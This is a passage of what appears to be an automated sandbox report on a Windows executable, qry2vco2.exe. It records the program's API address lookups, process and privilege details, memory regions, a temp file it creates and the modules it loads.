| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x74f66110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x74f587e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x74f65f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x74f64a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x74f65fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x74f5a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x74f5c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x74f66300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x74f59a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x74f661b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x74f5fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77704f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x74f59a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x74f579b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x74f5fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x74f592b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x74f5a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x74f66180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x74f63a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x74f58cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x74f65f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74f52af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x74f578f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74f52db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74f52da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x74f57a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x74f5a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x74f59660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x74f5a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x74f5a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x74f587c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x74f58840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x74f57940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x74f59560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x74f669c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x74f66390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x74f81c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x74f668e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x74f66920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x74f66540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x776f5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x776f5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x74f826a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x776eda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x7770f190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x7770a200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x74f674f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x74f59fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x74f52d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x74f575a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74f525e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x74f66870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x74f668c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x74f66900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x74f59700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x74f51b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77712570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x74f57920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77709920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x74f662a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x74f66590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x74f66860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x74f59680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x74f664a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x74f5a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x74f828e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x74f5a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x74f66020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x74f577b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x74f5fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x74f59a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x74f51ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x74f51da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x74f59930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x74f5a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x74f58770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x74f5fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x74f59fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74f57910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x74f59a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x74f52dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74f51d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x74f52b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x74f5a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x74f5a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x776ebae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x74f664f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x7756ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x7756fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x775695e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x77570680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x7756ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x7756f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x7756ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x7756ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x7756f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x775706c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x7756efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x7756f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x766dc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x750dee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x750b55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x750b57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x750b9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x750b0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x750dfbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x76c838f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x76c9b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x76c9b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x76c87740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x76c974e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x76c9efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x76ca4ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x76c94580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x76c91540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x742f1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x742f1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x742f1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x74f5a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x74f5f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x74f57580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x74f59910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x74f66030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x74f65f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x74f65ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x74f5a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x74f5a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x776e40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x776dd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x776decf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x74f65720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x776de140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x776deb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77719990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77715540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77709dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x74f5a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x74f80a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x752c0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x74f5f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x74f5fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x74f81030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x74f5a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x74f814b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x74f5a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x74f816f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x74f59970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x75243c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x74f58710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x74f596e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-01-23 14:13:29 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #245: qry2vco2.exe
175
0
| Information | Value |
|---|---|
| ID | #245 |
| File Name | c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe |
| Command Line | qRY2vco2.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:56, Reason: Child Process |
| Unmonitor | End Time: 00:03:59, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x91c |
| Parent PID | 0x770 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B74
0x
FE0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x00290fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x002affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x003effff | Private Memory | rw |
|
|
|
- |
| qry2vco2.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0068ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00480000 | 0x004a9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000590000 | 0x00590000 | 0x0068ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000690000 | 0x00690000 | 0x0085ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000690000 | 0x00690000 | 0x00817fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000850000 | 0x00850000 | 0x0085ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000860000 | 0x00860000 | 0x009e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009f0000 | 0x009f0000 | 0x01deffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001df0000 | 0x01df0000 | 0x01f3ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74220000 | 0x742b1fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x74ab0000 | 0x74abbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75180000 | 0x7518efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75310000 | 0x766cefff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x766d0000 | 0x7678dfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76790000 | 0x76c6cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x77260000 | 0x772a3fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77300000 | 0x7738cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x74f40000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x77550000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x766d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75030000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76c70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x742f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x74f660c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x74f66110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x74f587e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x74f65f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x74f64a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x74f65fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x74f5a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x74f5c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x74f66300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x74f59a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x74f661b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x74f5fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77704f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x74f59a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x74f579b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x74f5fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x74f592b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x74f5a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x74f66180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x74f63a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x74f58cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x74f65f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74f52af0 |
|
1 | |
